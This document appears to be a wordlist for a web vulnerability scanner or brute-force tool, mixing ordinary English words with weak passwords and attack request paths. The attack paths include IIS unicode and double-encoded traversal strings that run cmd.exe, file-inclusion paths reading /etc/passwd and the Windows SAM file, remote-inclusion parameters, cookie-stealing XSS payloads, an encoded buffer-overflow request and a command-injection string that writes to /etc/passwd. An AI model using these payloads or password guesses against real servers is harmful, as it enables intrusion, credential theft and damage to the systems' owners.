huiyuan-2
huiyuan-3
huiyuan-4
huiyuan-5
hy-ffkp
hy-ffkp1
ibill/cgi-bin/mastergate/search.cgi
ibill/mastergate/search.cgi
ibp/search.cgi
ice-cream
i'd
idc2007@))&
idc2008@))*
idczxcvbnm,.
igate/search.cgi
iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
i'll
i'm
imagegallery.aspx?rif=/&cif=../&ftb=reproduct_content2
imagegallery.aspxx?rif=/&cif=../&ftb=reproduct_content2
imagegallery.phpx?rif=/&cif=../&ftb=reproduct_content2
i'mok
i'mokay
index%252easp
index%252ejsp
index%2easp
index%2ejsp
index.asp%3f
index.asp..
index.aspx%3f
index.aspx..
index.jsp%3f/bak
index.jsp./bak
index.jsp/%3f
index.jsp?/jsp
index.php%3f
index.php..
index.php?file=../../../../../../etc/passwd
index.php?file=/etc/passwd
index.php?page=../../../../etc/passwd
irc-macadmin
i's
isn't
it&t
it'd
it'll
it'sajoke
it'sok
it'sokay
itsy-bitsy
itty-bitty
i've
jack-li
javascript:gotourl
javascript:gotourl(
javascript:gotourl('http:/www.cmbchina.com/')
javascript:gotourl('http:/www.eachnet.com/')
javascript:gotourl('http:/www.eastmoney.com/')
javascript:gotourl('http:/www.hunantv.com/')
jean-cla
je-hurn
jianfei$
jifen-leavel
jkl;
jo-ann
jo-anne
joined-the-details
j's
js-hit
js-ly
jsp-examples
js-pic
js-pic2
js-shangxiatiao
js-tp
js-tp2
js-xgxx
jul-86
jywl****
kara-lynn
kindeditor/php/file_manager_json.asp?path=
kkk&fun
kok-kia
kong-12
kosil-files
krsk-files
k's
kuo-juey
l;urette
lanmang@idc2007
lanmang@idc2008
lanyue&*(
law.com/admin_article/admin_login
lbi-html/ly
ldsxwl!)($
led-zeppelin
level/42/exec/show%20conf
lfw-168
liuli@
living-room
l'oeil
login-admin
login-redirect
login-us
logs/.memberfile
logs/access.logs
l's
lucky-may
l'vov
lvye135~!@
ly-write
m=a
ma@06&21
mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/passwd
main.jsp%3f
main.jsp..
main.jsp?/jsp
manage/cgi/cgiproc?nocfile=/system/core
manage/cgi/cgiproc?nocfile=/system/keys
manage/ewebeditor2.8
marie-ann
marie-jeanne
mastergate/search.cgi
math-cs
members/~admin
members/cgi-bin
members/cwb-data/data
members-only
members-only/admin/db/htpasswd
members-only/data/passwdfile
members-only/htpasswd
meta-inf
mfk-face
mid-autumn
mightn't
mmddkk88pp,.
moo-admin
mp3/about:blank
msadc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
msadc/..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
msadc/..%255c../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
msadc/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
msadc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
msadc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
msadc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
msadc/root.exe/c+dir
msadc/root.exe?/c+dir
ms-admin
mtc/search.cgi
mustn't
myfavouriate-back
mysql-admin
my-way
names.nsf/open
needn't
news/kindeditor/php/file_manager_json.asp?path=
newscode-news
newstg-save
nfbm-files
nobody'd
nogah$@!
non-cgi
nph-test-cgi
n's
null.htw?ciwebhitsfile=/index.htm&cirestriction="<script>alert(document.domain)</script>"
null.printerhttp/1.0/r/n/r/n
obi-wan
o'brien
o'clock
o'connell
o'connor
o'dell
o'donnell
o'dwyer
o'er
office/web%5fadmin
o'hare
ok-he
ok-hexlb
o'leary
o'neill
opendir.php?requesturl=/etc/passwd
opendir.phprequesturl=/etc/passwd
opt/netscape/suitespot/admin-serv/config/admpw
o's
o'shea
o'sullivan
oughtn't
outer-glow
outlook-like
p@ssw0rd
p@sswd
p@ssword
pages&
pages/css/background.cssrel=stylesheettype=text/css
pages/javascript:
pages/pages2/cankao/(null)
pages/pages2/shehui/lishi/javascript:
pages/pages2/yishu/javascript:
pagesfile:/e:/daring
pagesjavascript:
pala-files
pals-cgi
pals-cgi?palsaction=restart&documentname=/bin/id
pals-cgipalsaction
paper@()*
pbserver/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
pbserver/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
pbserver/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
pbserver/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
pbserver/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
pbserver/pbserver.dll?osarch=0&ostype=2&lcid=eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee&osver=%55%8b%ec%90%90%90%90%90%bb%ff%ff%ff%ff%83%eb%8b%53%68%6e%2e%74%78%68%76%6f%72%75%68%20%70%73%72%68%69%72%20%3e%68%2f%63%20%64%90%90&cmver=%68%65%78%65%20%68%63%6d%64%2e%b8%86%a9%f1%77%8b%dc%33%f6%56%53%ff%d0%90%90ddddddddddddddddddd&pbver=&0pb=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%4c%55%93%5e%cc%ccaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%e4%51%93%5ennnnhttp/1.1/r/nhost:yourhost/r/n/r/n
penit-admin
photoads/cgi-bin
php/php.exe?c:/winnt/repair/sam
php/php.exec:/winnt/repair/sam
php-bin
php-bin/manage
phplib/page.asp?_phplib[libdir]=http:/www.china.com
phplib/page.asp?_phplib[libdir]=http:www.china.com
phplib/page.aspx?_phplib[libdir]=http:/www.china.com
phplib/page.aspx?_phplib[libdir]=http:www.china.com
phplib/page.jsp?_phplib[libdir]=http:/www.china.com
phplib/page.jsp?_phplib[libdir]=http:www.china.com
phplib/page.php?_phplib[libdir]=http:/www.china.com
phplib/page.php?_phplib[libdir]=http:www.china.com
phpmy-admin
php-myadmin
php-my-admin
phpmyadmin/sql.php?btndrop=no&goto=/etc/passwd
phpmyadmin/sql.phpbtndrop=no&goto=/etc/passwd
phpmyadmin-2
phpmyadmin-2.2.3
phpmyadmin-2.2.6
phpmyadmin-2.5.1
phpmyadmin-2.5.4
phpmyadmin-2.5.5
phpmyadmin-2.5.5-pl1
phpmyadmin-2.5.5-rc1
phpmyadmin-2.5.5-rc2
phpmyadmin-2.5.6
phpmyadmin-2.5.6-rc1
phpmyadmin-2.5.6-rc2
phpmyadmin-2.5.7
phpmyadmin-2.5.7-pl1
phpmyadmin-2.6.0
phpmyadmin-2.6.0-alpha
phpmyadmin-2.6.0-alpha2
phpmyadmin-2.6.0-beta1
phpmyadmin-2.6.0-beta2
phpmyadmin-2.6.0-pl1
phpmyadmin-2.6.0-pl2
phpmyadmin-2.6.0-pl3
phpmyadmin-2.6.0-rc1
phpmyadmin-2.6.0-rc2
phpmyadmin-2.6.0-rc3
phpmyadmin-2.6.1
phpmyadmin-2.6.1-pl1
phpmyadmin-2.6.1-pl2
phpmyadmin-2.6.1-pl3
phpmyadmin-2.6.1-rc1
phpmyadmin-2.6.1-rc2
phpmyadmin-2.6.2
phpmyadmin-2.6.2-beta1
phpmyadmin-2.6.2-pl1
phpmyadmin-2.6.2-rc1
phpmyadmin-2.6.3
phpmyadmin-2.6.3-pl1
phpmyadmin-2.6.3-rc1
phpmyadmin-2.6.4
phpmyadmin-2.6.4-pl1
phpmyadmin-2.6.4-pl2
phpmyadmin-2.6.4-pl3
phpmyadmin-2.6.4-pl4
phpmyadmin-2.6.4-rc1
phpmyadmin-2.7.0
phpmyadmin-2.7.0-beta1
phpmyadmin-2.7.0-pl1
phpmyadmin-2.7.0-pl2
phpmyadmin-2.7.0-rc1
phpmyadmin-2.8.0
phpmyadmin-2.8.0.1
phpmyadmin-2.8.0.2
phpmyadmin-2.8.0.3
phpmyadmin-2.8.0.4
phpmyadmin-2.8.0-beta1
phpmyadmin-2.8.0-rc1
phpmyadmin-2.8.0-rc2
phpmyadmin-2.8.1
phpmyadmin-2.8.1-rc1
phpmyadmin-2.8.2
phpphotoalbum/getalbum.php?album=../../../etc
phprocketaddin/?page=../../../../etc/passwd
phprpg-0.8.0/tmp
piccodejs-vip
ping-san
-pl,
-pl,0okm
play%ef%bc%8c5061%ef%bc%8c10128%ef%bc%8c0
play,5061,10128,0http:/www.gougou.com
play,5061,10128,0http:www.gougou.com
play,6183,12374,19%20%20
play,7
play,791,1587,
plug-ins
porsjie-1
prd.i/pgen
products/phpphotoalbum/explorer.php?folder=../../../../../../../etc
project-admins
p's
pt-br
publisher/|publisher
qaz!!!
qazpl,
qazpl,okm
qazwsx!!!
qpwoeiruty+
qpwoeiruty+_)
q's
qwe,.
qwertyuiop[]
qyweb(bool)
r&d
radmind-1
related-news
relogin-admin
resin-doc
rounded-white
rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:
rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:
rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
r's
s=d
sa@1433
sa@2007
sa@20082008
samples/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
samples/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
samples/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
samples/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
samples/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
samples/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
samples/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
samples/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
samples/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
samples/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
samples/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
sara-ann
scripts/*
scripts/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
scripts/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%252f../winnt/system32/cmd.exe?/c+dir
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%255c../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir
scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir%20c:
scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir+c:
scripts/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u0025%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:
scripts/..%u00255c../..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u002f../..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
scripts/..%u002f../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
scripts/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/..%u005c../winnt/system32/cmd.exe?/c+dir
scripts/c32web.exe/changeadminpassword
scripts/cart32.exe/cart32clientlist
scripts/ccc.exe/c+dir
scripts/ccc.exe?/c+dir
scripts/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c%20dir%20c:
scripts/cmd.exe/c+dir
scripts/cmd.exe?/c+dir
scripts/cmd1.exe?+/c+dir
scripts/cmd1.exe+/c+dir
scripts/cmd32.exe/c+dir
scripts/cmd32.exe?/c+dir
scripts/command.exe?+/c+dir
scripts/command.exe+/c+dir
scripts/cphost.dll?my_file=localthing&targeturl=/sites/publishing/srvname/ldap_anonymous
scripts/eeyehack.exe?+/c+dir
scripts/eeyehack.exe+/c+dir
scripts/hack.exe/c+dir
scripts/hack.exe?/c+dir
scripts/i.exe/c+dir
scripts/i.exe?/c+dir
scripts/iisadmin/bdir.htr?dir=ht??c:
scripts/iisadmin/ism.dll?dir/bdir+??c:
scripts/iisadmin/ism.dll?http/dir
scripts/iisadmin/ism.dll?http/dir%20../..
scripts/iisadmin/ism.dlldir/bdir+c:
scripts/iisadmin/ism.dllhttp/dir
scripts/nph-publish
scripts/nph-test-cgi
scripts/root.exe/c+dir
scripts/root.exe?/c+dir
scripts/sensepost.exe?+/c+dir
scripts/sensepost.exe+/c+dir
scripts/srx.exe?+/c+dir
scripts/srx.exe+/c+dir
scripts/view-source
scripts/w3-msql
scripts/websec.bat
scripts/www-sql
sdf$tv
search.dll?search?query=/&logic=and
search.dllsearchquery=/&logic=and
search2-ok
second-hand
server%+logfile
server+logfile
server-info
server-scripts
server-status
servicesystem/login-admin
servlet/com.newatlanta.servletexec.jspservlet
setdiscount-temp
sheila-kathryn
shit-head
showerr.asp?boardid=0&errcodes=54&action=<script>javascript:alert(document.cookie);</script>
showploy-1
sjh@
skin-bak
sky_master!1986
so-called
sql/db_type.php?waroot=http:/anotherhost_start_php
sql-admin
squirrelspell/modules/check_me.mod.php?sqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
squirrelspell/modules/check_me.mod.phpsqspell_app[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
sr-latn
st-admin
star-x/van
students-supplies-js
sub-login
sun-spot
super-admin
sys-admin
system^
system-administration
sywebeditor/sel_uploadfile.asp?obj=prophoto&filetype=gif|jpg|png|&filepathtype=1&filepath=/photofile/profile
tangke*80231314
t-bone
tcp-ip
technote/main.cgi/oops
templates/default/images/bookmarkv%3e%20%20%3c/div%3e%3c/div%3e%3c/div%3e%3cdiv%20class=
templates/n%20class=
tencent:/message
terri-jo
test.jsp..
texteditor/dialogs/upload.asp?uploadfolder=../../upfile
texteditor/dialogs/upload.asp?uploadfolder=../../upfile.asp
texteditor/dialogs/upload.aspx?uploadfolder=../../upfile
texteditor/dialogs/upload.aspx?uploadfolder=../../upfile.asp
tgrnf@12
thu-ji
tianjia-lb
ticket_main-1
ticket_main-2
ting5201314`
top-2
top-me
tp-shangchuan
-tre
t-shirt
tsing-tao
tui-web
tzi-dar
uhn-soon
unix/alex/xerver2.10
unix-tounix
upload.asp?uppath=/fd_upimg
up-to-date
ur-admin
user-msg
user-news
userreg.cgi?cmd=insert</=eng&tnum=3&fld1=test999%0acat</var/spool/mail/login>>/etc/passwd
userreg.cgi?cmd=insert>/etc/passwd
userreg.cgicmd=insert>/etc/passwd
us-na-tzu-js
vi-cn
vi-cndata
viewpage.php?file=/etc/passwd
web-inf
web-manager
website-information
webstart+log
webyx-100
webyx-1000
webyx-200
webyx-2500
webyx-50
webyx-500
webyx-wx
well-known
wen-mei
wikihome/action/conflict.php?templatedir=http:/my.host
win2k-1
win2k-2
woool@2008
wp-admin
'wp-admin
wp-html-rend
wp-includes
wp-login
wr@1844
www.china.com
www-sql
xiangce-heka
xijiaoyuan123)(
xiugai-lb
xml-rpc
x-ray
xue-jun
xxxxxxx.....xxxxxxxxx
xz21]lcdong
xzy%23ye55
xzy%23ye551
yabba-dabba-doo
yb888mail/.
you'reok
ytoe-files
yung-hsi
zaq!@wsx
zaq!xsw@
zaq1@wsx
z-blog
zdx-files
zdy-shangchuan
zh-cn
zh-hk
zh-sg
zh-tw
zitian&*(
zitian(*&
zjewww6168!qaz
zm-89
znhyy10599@!
zxasqw!@
zz-top